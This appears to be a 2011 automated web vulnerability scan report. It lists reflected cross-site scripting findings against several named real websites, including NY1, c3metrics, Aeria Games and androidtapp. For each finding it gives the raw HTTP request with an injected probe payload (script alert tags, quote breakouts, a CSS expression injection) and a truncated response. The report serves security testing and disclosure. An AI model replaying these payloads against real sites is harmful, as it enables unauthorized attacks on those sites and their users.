HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:01 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56119 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:02 GMT Date: Fri, 01 Apr 2011 18:11:02 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content42631';c0299a9928d/ServeContent.aspx'; var gRegionSelected = '5';//]]> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /Content/ServeContent |
GET /Content/ServeContent Host: manhattan.ny1.com Proxy-Connection: keep-alive Referer: http://manhattan.ny1.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=tsgnewsglobal1 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:07 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56167 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:09 GMT Date: Fri, 01 Apr 2011 18:11:09 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /Content/ServeResource |
GET /Contentbdf4b'%3b8443ca8f92f/ServeResource.aspx?id Host: manhattan.ny1.com Proxy-Connection: keep-alive Referer: http://manhattan.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=tsgnewsglobal1 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:04 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56125 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:06 GMT Date: Fri, 01 Apr 2011 18:11:06 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Contentbdf4b';8443ca8f92f/ServeResource.aspx'; var gRegionSelected = '5';//]]> ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /Content/ServeResource |
GET /Content/ServeResource Host: manhattan.ny1.com Proxy-Connection: keep-alive Referer: http://manhattan.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=tsgnewsglobal1 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:08 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56168 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:13 GMT Date: Fri, 01 Apr 2011 18:11:13 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/Content ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /content/top_stories/ |
GET /contentb67a1'%3b361ba9d45fb/top_stories/ HTTP/1.1 Host: manhattan.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=tsgnewsglobal1 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:25 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56145 Vary: Accept-Encoding Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:29 GMT Date: Fri, 01 Apr 2011 18:11:29 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/contentb67a1';361ba9d45fb/top_stories/default.aspx ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://manhattan.ny1.com |
Path: | /content/top_stories/ |
GET /content/top_storiesdc2d4'%3b52263977e93/ HTTP/1.1 Host: manhattan.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=tsgnewsglobal1 |
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:30 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 56146 Vary: Accept-Encoding Cache-Control: public, max-age=564 Expires: Fri, 01 Apr 2011 18:20:59 GMT Date: Fri, 01 Apr 2011 18:11:35 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - NY1.com </title><meta ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?aspxerrorpath=/content ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://manhattan.ny1.com |
Path: | /content/top_stories/ |
GET /content/top_stories/?6532b'-alert(1)- Host: manhattan.ny1.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_cc=true; s_sq=tsgnewsglobal1 |
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Last-Modified: Fri, 01 Apr 2011 18:11:24 GMT Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 86281 Cache-Control: public, max-age=600 Expires: Fri, 01 Apr 2011 18:21:26 GMT Date: Fri, 01 Apr 2011 18:11:26 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head id="ctl00_Head1"><title> Top Stories - - NY1.com </title><me ...[SNIP]... <![CDATA[ var stationId = 1; var currentQueryString = '?SectionPath=%2fcontent ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.fetchback |
Path: | /serve/fb/pdc |
GET /serve/fb/pdc?cat=&name Host: pixel.fetchback.com Proxy-Connection: keep-alive Referer: http://www.mercantila.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=92051597 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 17:01:55 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: cmp=1_1301677315_11259:9 Set-Cookie: uid=1_1301677315 Set-Cookie: kwd=1_1301677315_11317 Set-Cookie: sit=1_1301677315_3047:9:9 Set-Cookie: cre=1_1301677315_20056 Set-Cookie: bpd=1_1301677315_h9i9 Set-Cookie: apd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/ Set-Cookie: scg=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/ Set-Cookie: ppd=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/ Set-Cookie: afl=1_1301677315; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:55 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Fri, 01 Apr 2011 17:01:55 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91 <!-- campaign : 'landinga1c83<x style=x:expression(alert |
Severity: | High |
Confidence: | Certain |
Host: | http://pubads.g |
Path: | /gampad/ads |
GET /gampad/ads?correlator Host: pubads.g.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: TMedia=Coun%3ANA/Postal |
HTTP/1.1 200 OK P3P: policyref="http:/ Content-Type: text/javascript; charset=UTF-8 X-Content-Type-Options: nosniff Date: Fri, 01 Apr 2011 18:16:52 GMT Server: gfp-be Cache-Control: private, x-gzip-ok="" Content-Length: 2804 X-XSS-Protection: 1; mode=block GA_googleSetAdConten ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://suggest.infospace |
Path: | /QuerySuggest/Sugges |
GET /QuerySuggest/Sugges Host: suggest.infospace.com Proxy-Connection: keep-alive Referer: http://www.dogpile.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 97 Date: Fri, 01 Apr 2011 16:57:02 GMT Connection: close iSuggest.PopulateResults |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:11:23 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 4808e422<script>alert(1)< Set-Cookie: 4808e422<script>alert(1)< Set-Cookie: 4808e422<script>alert(1)< Content-Length: 6700 Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a]=new c3VTJSInter();this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:11:20 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_04-01-2011 Set-Cookie: 480-VT=drive_03-24-2011 Set-Cookie: 480-nUID=adver_43003 Content-Length: 6700 Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... ar.c3VJScollection[a] ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:11:35 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_04-01-2011 Set-Cookie: 480-VT=drive_03-24-2011 Set-Cookie: 480-nUID=adcon_13920 Content-Length: 6679 Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... .c3VJSnuid='44129250 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:11:28 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_04-01-2011 Set-Cookie: 480-VT=drive_03-24-2011 Set-Cookie: 480-nUID=adcon_13920 Content-Length: 6699 Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... 97811300976568';this ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:11:25 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_04-01-2011 Set-Cookie: 480-VT=drive_03-24-2011 Set-Cookie: 480-nUID=adcon_13920 Content-Length: 6700 Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... his.C3VTcallVar ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /c3VTabstrct-6-2.php |
GET /c3VTabstrct-6-2.php?id Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:11:30 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Set-Cookie: 480-SM=adver_04-01-2011 Set-Cookie: 480-VT=drive_03-24-2011 Set-Cookie: 480-nUID=adcon_13920 Content-Length: 6678 Content-Type: text/html if(!window.c3VTconsts) ...[SNIP]... S.c3VJSnuid='9906481 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /v.js |
GET /v.js?id=adver&cid=480526ca<script>alert(1)< Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:10:54 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1039 Content-Type: text/html if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /v.js |
GET /v.js?id=adver4591c<script>alert(1)< Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:10:51 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1039 Content-Type: text/html if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://view.c3metrics.com |
Path: | /v.js |
GET /v.js?id=adver&cid=480&t Host: view.c3metrics.com Proxy-Connection: keep-alive Referer: http://www.ny1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: C3UID=15400897811300 |
HTTP/1.1 200 OK Date: Fri, 01 Apr 2011 18:10:56 GMT Server: Apache P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Cache-Control: no-cache Expires: -1 Content-Length: 1039 Content-Type: text/html if(!window.c3VTconstVal) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.aeriagames.com |
Path: | /favicon.ico |
GET /favicon.icof51ac"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.aeriagames.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 200 OK Set-Cookie: AGESESSID=253b9e3fed Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 16:12:06 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\" Content-Type: text/html; charset=utf-8 Date: Fri, 01 Apr 2011 16:12:06 GMT Server: Aeria Games & Entertainment Content-Length: 30952 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <a lang="en" href="javascript:void(0); ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.aeriagames.com |
Path: | /favicon.ico |
GET /favicon.ico?3b7d3"><script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.aeriagames.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 200 OK Set-Cookie: AGESESSID=5d5f9a7f97 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 16:12:02 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\" Content-Type: text/html; charset=utf-8 Date: Fri, 01 Apr 2011 16:12:02 GMT Server: Aeria Games & Entertainment Content-Length: 30979 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <a lang="en" href="javascript:void(0); ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.aeriagames.com |
Path: | /meebo.html |
GET /meebo.htmld1ddf"><script>alert(1)< Host: www.aeriagames.com Proxy-Connection: keep-alive Referer: http://www.aeriagames.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AGESESSID=253b9e3fed |
HTTP/1.1 200 OK Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:19 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\" Content-Type: text/html; charset=utf-8 Date: Fri, 01 Apr 2011 18:17:19 GMT Server: Aeria Games & Entertainment Content-Length: 31114 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <a lang="en" href="javascript:void(0); ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.aeriagames.com |
Path: | /themes/main/favicon.ico |
GET /themes/main/favicon.ico86f0a"><script>alert(1)< Host: www.aeriagames.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AGESESSID=253b9e3fed |
HTTP/1.1 200 OK Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:48 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\" Content-Type: text/html; charset=utf-8 Date: Fri, 01 Apr 2011 18:17:48 GMT Server: Aeria Games & Entertainment Content-Length: 31060 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <a lang="en" href="javascript:void(0); ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.aeriagames.com |
Path: | /themes/main/favicon.ico |
GET /themes/main/favicon.ico?2e0ac"><script>alert(1)< Host: www.aeriagames.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: AGESESSID=253b9e3fed |
HTTP/1.1 200 OK Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Fri, 01 Apr 2011 18:17:47 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 P3P: CP=\"CAO IDC DSP COR CURa ADMa PSA OUR IND PHY ONL COM STA\" Content-Type: text/html; charset=utf-8 Date: Fri, 01 Apr 2011 18:17:47 GMT Server: Aeria Games & Entertainment Content-Length: 31087 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <met ...[SNIP]... <a lang="en" href="javascript:void(0); ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /favicon.ico |
GET /favicon.icoef3b2<script>alert(1)< User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.androidtapp.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Date: Fri, 01 Apr 2011 15:39:01 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Set-Cookie: PHPSESSID=bd8c5d93b8 Last-Modified: Fri, 01 Apr 2011 15:39:01 GMT Vary: Cookie Expires: Fri, 01 Apr 2011 16:39:01 GMT Pragma: public Cache-Control: public, must-revalidate, proxy-revalidate ETag: e3aa57f2bc9542101a5b Vary: User-Agent Content-Length: 55020 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /favicon.icoef3b2 |
GET /favicon.icoef3b2 Host: www.androidtapp.com Proxy-Connection: keep-alive Referer: http://www.androidtapp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=cfd4e1e223 |
HTTP/1.1 404 Not Found Date: Fri, 01 Apr 2011 18:15:50 GMT Server: LiteSpeed Connection: close X-Pingback: http://www.androidtapp Content-Type: text/html; charset=UTF-8 X-Powered-By: W3 Total Cache/0.9.1.1 Last-Modified: Fri, 01 Apr 2011 18:15:50 GMT Vary: Accept-Encoding, Cookie Expires: Fri, 01 Apr 2011 19:15:50 GMT Pragma: public Cache-Control: public, must-revalidate, proxy-revalidate ETag: 699ce975eff4981aa591 Vary: User-Agent Content-Length: 55461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR xmlns="http://www.w3.org profile ...[SNIP]... <strong> http://www.androidtapp ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.androidtapp |
Path: | /favicon.icoef3b2 |
